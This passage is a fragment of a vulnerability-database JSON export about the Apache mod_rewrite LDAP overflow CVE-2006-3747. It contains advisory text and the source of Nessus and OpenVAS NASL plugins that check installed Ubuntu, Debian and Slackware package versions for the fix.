"AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:45:00", "description": "Mark Dowd discovered an off-by-one buffer overflow in the mod_rewrite\nmodule's ldap scheme handling. On systems which activate\n'RewriteEngine on', a remote attacker could exploit certain rewrite\nrules to crash Apache, or potentially even execute arbitrary code\n(this has not been verified).\n\n'RewriteEngine on' is disabled by default. Systems which have this\ndirective disabled are not affected at all.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2007-11-10T00:00:00", "title": "Ubuntu 5.04 / 5.10 / 6.06 LTS : apache2 vulnerability (USN-328-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:apache2-prefork-dev", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-perchild", "p-cpe:/a:canonical:ubuntu_linux:apache-ssl", "p-cpe:/a:canonical:ubuntu_linux:apache", "p-cpe:/a:canonical:ubuntu_linux:apache-dev", "cpe:/o:canonical:ubuntu_linux:5.04", "p-cpe:/a:canonical:ubuntu_linux:libapr0", "p-cpe:/a:canonical:ubuntu_linux:apache-common", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-prefork", "p-cpe:/a:canonical:ubuntu_linux:libapr0-dev", "p-cpe:/a:canonical:ubuntu_linux:apache2", "p-cpe:/a:canonical:ubuntu_linux:apache-dbg", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-threadpool", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-worker", "p-cpe:/a:canonical:ubuntu_linux:apache-perl", "cpe:/o:canonical:ubuntu_linux:5.10", "p-cpe:/a:canonical:ubuntu_linux:apache2-threaded-dev", "p-cpe:/a:canonical:ubuntu_linux:apache2-doc", "p-cpe:/a:canonical:ubuntu_linux:apache2-common", "p-cpe:/a:canonical:ubuntu_linux:apache2-utils", "p-cpe:/a:canonical:ubuntu_linux:libapache-mod-perl", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts", "p-cpe:/a:canonical:ubuntu_linux:apache-doc"], "id": "UBUNTU_USN-328-1.NASL", "href": "https://www.tenable.com/plugins/nessus/27907", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-328-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27907);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/08/02 13:33:01\");\n\n script_cve_id(\"CVE-2006-3747\");\n script_xref(name:\"USN\", value:\"328-1\");\n\n script_name(english:\"Ubuntu 5.04 / 5.10 / 6.06 LTS : apache2 vulnerability (USN-328-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mark Dowd discovered an off-by-one buffer overflow in the mod_rewrite\nmodule's ldap scheme handling. On systems which activate\n'RewriteEngine on', a remote attacker could exploit certain rewrite\nrules to crash Apache, or potentially even execute arbitrary code\n(this has not been verified).\n\n'RewriteEngine on' is disabled by default. Systems which have this\ndirective disabled are not affected at all.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/328-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache-ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-perchild\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-threadpool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-prefork-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-threaded-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache-mod-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapr0-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(5\\.04|5\\.10|6\\.06)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 5.04 / 5.10 / 6.06\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-common\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-doc\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-mpm-perchild\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-mpm-prefork\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-mpm-threadpool\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-mpm-worker\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-prefork-dev\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-threaded-dev\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-utils\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libapr0\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libapr0-dev\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-common\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-doc\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-mpm-perchild\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-mpm-prefork\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-mpm-threadpool\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-mpm-worker\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-prefork-dev\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-threaded-dev\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-utils\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libapr0\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libapr0-dev\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache\", pkgver:\"1.3.34-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache-common\", pkgver:\"1.3.34-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache-dbg\", pkgver:\"1.3.34-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache-dev\", pkgver:\"1.3.34-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache-doc\", pkgver:\"1.3.34-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache-perl\", pkgver:\"1.3.34-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache-ssl\", pkgver:\"1.3.34-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-common\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-doc\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-mpm-perchild\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-mpm-prefork\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-mpm-worker\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-prefork-dev\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-threaded-dev\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-utils\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libapache-mod-perl\", pkgver:\"1.29.0.4-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libapr0\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libapr0-dev\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache / apache-common / apache-dbg / apache-dev / apache-doc / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:44:40", "description": "Mark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. In some situations a\nremote attacker could exploit this to execute arbitrary code.", "edition": 26, "published": "2006-10-14T00:00:00", "title": "Debian DSA-1132-1 : apache2 - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2006-10-14T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:apache2"], "id": "DEBIAN_DSA-1132.NASL", "href": "https://www.tenable.com/plugins/nessus/22674", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1132. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22674);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-3747\");\n script_xref(name:\"CERT\", value:\"395412\");\n script_xref(name:\"DSA\", value:\"1132\");\n\n script_name(english:\"Debian DSA-1132-1 : apache2 - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. In some situations a\nremote attacker could exploit this to execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=380182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1132\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the apache2 package.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 2.0.54-5sarge1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"apache2\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-common\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-doc\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-mpm-perchild\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-mpm-prefork\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-mpm-threadpool\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-mpm-worker\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-prefork-dev\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-threaded-dev\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-utils\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libapr0\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libapr0-dev\", reference:\"2.0.54-5sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:49:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "description": "The remote host is missing an update to apache2\nannounced via advisory DSA 1132-1.\n\nMark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. In some situations a\nremote attacker could exploit this to execute arbitrary code.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:57200", "href": "http://plugins.openvas.org/nasl.php?oid=57200", "type": "openvas", "title": "Debian Security Advisory DSA 1132-1 (apache2)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1132_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1132-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 2.0.54-5sarge1.\n\nFor the unstable distribution (sid) this problem will be fixed shortly.\n\nWe recommend that you upgrade your apache2 package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201132-1\";\ntag_summary = \"The remote host is missing an update to apache2\nannounced via advisory DSA 1132-1.\n\nMark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. In some situations a\nremote attacker could exploit this to execute arbitrary code.\";\n\n\nif(description)\n{\n script_id(57200);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:13:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-3747\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1132-1 (apache2)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-threadpool\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-common\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-perchild\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr0\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr0-dev\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:51:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-209-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:57168", "href": "http://plugins.openvas.org/nasl.php?oid=57168", "type": "openvas", "title": "Slackware Advisory SSA:2006-209-01 Apache httpd", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_209_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New Apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1,\n10.2, and -current to fix a security issue with mod_rewrite.\n\nIn addition, new mod_ssl packages for Apache 1.3.37 are available for\nall of these versions of Slackware. This additional package does not\nfix a security issue, but may be required on your system depending on\nyour Apache setup.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-209-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-209-01\";\n \nif(description)\n{\n script_id(57168);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2006-3747\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2006-209-01 Apache httpd \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i386-1_slack8.1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i386-1_slack8.1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.37-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.28_1.3.37-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln 